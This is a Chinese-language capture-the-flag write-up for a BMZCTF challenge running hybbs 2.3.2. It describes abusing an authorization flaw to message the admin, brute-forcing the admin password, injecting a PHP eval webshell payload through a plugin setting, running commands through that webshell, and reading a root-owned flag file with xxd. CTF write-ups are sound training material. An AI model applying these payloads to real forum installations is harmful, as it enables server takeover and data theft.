CTF-伟大宝宝的保障-WP
题目来自BMZCTF,打开题目是hybbs2.3.2的,直接百度搜索相关漏洞即可
利用漏洞:
1.越权遍历给admin发私信,得到密码baobao(后9位需爆破)
2.修改全局配置-上传后缀加php(这个方法已经失效,题目被改过)
3.利用插件插入php代码
解题过程
首先越权给admin发送私信,其实这里算是遍历
admin的uid为1,尝试发送得到一个密码反馈
进行爆破得到admin密码为baobao123456789,进入后台插件新增
插入恶意代码:
111','name' =>eval($_REQUEST[1]),//
http://www.bmzclub.cn:20056/?admin/code.html
得到咱们webshell
http://www.bmzclub.cn:20056/Plugin/11/conf.php?1=system('whoami');
通过搜索文件你会看到一个flag.sh文件,判断flag在/root/flag,你当前权限非root,一开始我是想着提权后读取,卡了我好几天,后来发现是我草率了
freebuff有关于xxd的文章
使用这条命令可以直接读取到
xxd "/root/flag" | xxd -r